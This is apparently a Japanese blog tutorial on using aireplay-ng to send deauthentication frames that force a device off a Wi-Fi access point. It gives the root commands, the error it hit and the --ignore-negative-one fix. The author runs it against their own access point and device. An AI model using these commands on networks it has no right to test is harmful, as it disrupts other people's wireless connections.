前回のairodump-ngに引き続き、今回はaireplay-ngを使ってみようと思います
aireplay-ngはフレームインジェクションのためのツールで、主にWEPやWPA-PSKなどのクラッキングのためのaircrack-ngにおいて使用されるトラフィックを生成させるために使われているみたいです
参考：http://www.aircrack-ng.org/doku.php?id=aireplay-ng

これを使用してアクセスポイントに接続している端末を接続解除させようと思います

【用意するもの】
・アクセスポイント
・Ubuntu PC (aireplay-ngを使用する)
・接続を解除させる端末
上記をそれぞれ１台ずつ

【やること】
以下の図のような感じ

【手順】
まず、アクセスポイントと端末のMACアドレスを確認し、端末をアクセスポイントに接続させておきます

次にUbuntu上でaireplay-ngを実行させます

それまでの設定は前回の記事と同じです

airodump-ngでパケットキャプチャ【aircrack-ng】 - ysku's blog

一応、書いておくと、まずルート権限になり、他のプロセスが動いていないかを確認します

# sudo -s
# airmon-ng check wlan0

他のプロセスが動いている場合、影響を及ぼすことがあるかと思うので、それらを終了させます
私がこれを行ったときには、
・avahi-daemon
・Network-Manager
・wpa_supplicant
などが起動していました

次に仮想無線インターフェースを立ち上げます
(私の環境上ではmon0という名前でした)

# airmon-ng start wlan0

以下のコマンドで立ち上がったインターフェースを確認出来ます

# iwconfig

aireplay-ngを実行します

# aireplay-ng -0 1 -a [APのMACアドレス] -c [端末のMACアドレス] mon0

• 0：deauthenticationを意味します

1：deauthを送る数(0だと複数に継続的に送信させる)

• a [MAC Address]：アクセスポイントのMACアドレス
• c [MAC Address]：認証解除する端末のMACアドレス(省略すればすべての端末)

mon0：インターフェース名

これを実行したときに、次の様なエラーメッセージが表示されました

00:00:00   Waiting for beacon frame (BSSID:  XX:XX:XX:XX:XX:XX) on channel -1
00:00:00   Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch
Please specify an ESSID (-e).

チャネルが設定されていないようで、

# iwconfig mon0 channel [チャネル番号]

などのコマンドを実施してもチャネルがうまく設定されなかったです

そこで、

# aireplay-ng -0 1 --ignore-negative-one -a [APのMACアドレス] -c [端末のMACアドレス] mon0

を実行し、端末側で確認するとうまくいっていました